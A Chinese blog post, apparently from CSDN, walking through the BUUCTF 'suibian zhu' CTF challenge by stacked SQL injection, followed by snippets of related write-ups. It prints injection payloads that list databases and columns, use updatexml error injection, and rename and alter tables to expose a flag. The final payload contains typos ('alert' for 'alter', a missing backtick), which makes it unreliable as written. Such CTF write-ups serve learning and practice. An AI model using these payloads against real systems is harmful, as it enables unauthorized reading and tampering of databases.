buuctf-随便注

最新推荐文章于 2024-08-20 10:53:37 发布
最新推荐文章于 2024-08-20 10:53:37 发布
阅读量283 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixihahawuwu/article/details/109997393
版权

在这里插入图片描述题注上没有什么提示,进入环境
有一个提交查询,点击查询,数字为1时回显如下
在这里插入图片描述
数字为2回显如下,且文本框内数字自动变为1
在这里插入图片描述当数字大于2时,页面不会返回内容。说明字段数为2
看下源码
在这里插入图片描述在这里插入图片描述咳咳,这就过分了哈.我偏要用
先试下’

在这里插入图片描述
在这里插入图片描述再select下
在这里插入图片描述回显了关键字的过滤,union注入没法用
这里有一个知识点就是“堆积注入”
其实就是加了;之后接着注入
1’;show databases;爆下数据库
在这里插入图片描述
再爆个表

在这里插入图片描述好啊。尝试下把表内容爆出来
1’;show columns from words;
在这里插入图片描述没啥有用的
下一个,这里得注意一下,如果表名为数字时,需要使用反引号
1’;show columns from 1919810931114514;
在这里插入图片描述
哦吼,看到了flag字段
这道题目隐约有点印象。以前应该做过相似的题目
后面我们使用修改表名的方法来得到flag
1’; rename table words to 123; rename table 1919810931114514 to words; alert table words add id int unsigned not Null auto_increment primary key ; alert table words change flag data varchar(100);#
最后得到flag

一名无聊的网友
关注
BUUCTF 随便WP
小白渣的博客
12-19 1208
首先我们先看到题目,我们由题意可知是sql入 于是用 ’ 试试 然后我们尝试一些入的常用的词汇 发现都被过滤了,但是尝试一下 堆叠入就可发现 ';show tables;# 看了前面大佬的博客可以 绕过关键词过滤 关于MySQL中的预处理语句原理与使用,这篇文章讲解的比较详细:MySQL的SQL预处理(Prepared)本题中由于可以使用堆叠查询,并且需要使用SELECT关键字并绕...
BUUCTF-Web-随便-wp
single7_的博客
12-14 380
0x01 知识点 SQL入-堆叠入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种入方式称为堆叠入。 union injection(联合入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语
BUUCTF——随便
weixin_45864041的博客
09-21 754
看到题目我们先试着正常查询 当上传的数据被直接显示在了URL中,很有可能这里存在sql入漏洞,接下来,我们可以对猜想进行验证。 通过上面的验证,我们可以直到这里存在sql入漏洞,并且传递的参数被单引号包裹 从上面可以看到,这里过滤了一些字符,导致我们不能用联合查找的方式进行入,所以我们换一个思路,看一看是否可以进行堆叠入 通过上面的测试可以看到,可以进行堆叠入。 先查表。 查列名,在这里可以看到数字这张表里有flag。 但是select被过滤了,我们无法得到fl..
[CTF夺旗赛] BUUCTF N1BOOK 第一章 web入门
最新发布
Da1NtY的博客
08-20 794
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第一章,后续会陆续更新。
BUUCTF随便
金 帛的博客
04-03 5474
BUUCTF的WP
BUUCTF-随便
m0_74167420的博客
03-10 1551
报错入:报错入是通过特殊函数错误使用并使其输出错误结果来获取信息的。简单点说,就是在可以进行的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息。堆叠入:mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔开,而堆叠入其实就是通过结束符来执行多条sql语句。(1)报错盲,构建payload:第一种payload:inurl?
堆叠入——BUUCTF-随便
ancan8807的博客
09-07 659
由题目提示知道,这题需要进行sql入 输入1'发现报错 再输入1';show batabases#出现了一大堆数据库 再输入1';show tables#出现了两个表 猜测flag在这2个表中,输入1';show create table `1919810931114514`;尝试打开表1,发现 因为select被过滤了,所以先将select *...
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1384
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1252
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
BUUCTF-WEB
ccfly1012的博客
11-02 3871
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF随便
m0_54993799的博客
12-22 461
输入 1' and updatexml(1, (concat(0x7e,(select database()),0x7e)),1)利用数据库的表的特性,将原来的words表改名为words123,将1919那张表改名为 words;如果直接查值,那就需要 select,但是select已经被限制了。除了查询id=1的值,还把数据库的名字都查出来了。发现一些关键字被限制了,但分号没有被限制,输入 1'"# ,页面返回报错信息。输入 1'# ,得到如下页面。再提交 ' or 1=1 #
BUUCTF-随便(easy_sql)
weixin_51383898的博客
10-13 481
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错入,被过滤了使用联合入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
BUUCTF-web-随便
nareku的博客
07-06 1227
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
buuctf [强网杯 2019]随便
qq_1873822的博客
03-01 266
堆叠入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为: Select *
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2676
buuctf的强网杯2019为例的堆叠
buuctf 2019强网杯 随便
devilare的博客
09-26 345
2019强网杯 随便 来到页面发现只是一个提交栏 随意试一下输入1’有回显说明存在sql入,输入万能密码试试1’ or 1=1;#输入1’; union select;#看看能否联合查询一下存在过滤,且没办法通过大小写绕过,好难,看看wp。看来需要堆叠入(ps:堆叠入就是一次性执行多条查询语句) 输入1’;show databases;#查看所有的数据库;en。。。没有和flag有关的字样,再输入1’;show tables;#看看表 ...
BUUCTF web 随便
H4ppyD0g的博客
09-19 764
堆叠入 在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两条sql语句。由于两条语句堆叠在同一行,而不是原本应该各自占据一行,所以这种入成为堆叠入。 意1 当数字型字符作为字段、表、库名查询时,应该用反单引号括起来 输入 1 没有报错 1' 报错,证明存在入 1' # 没有报错 1' orde...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一名无聊的网友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值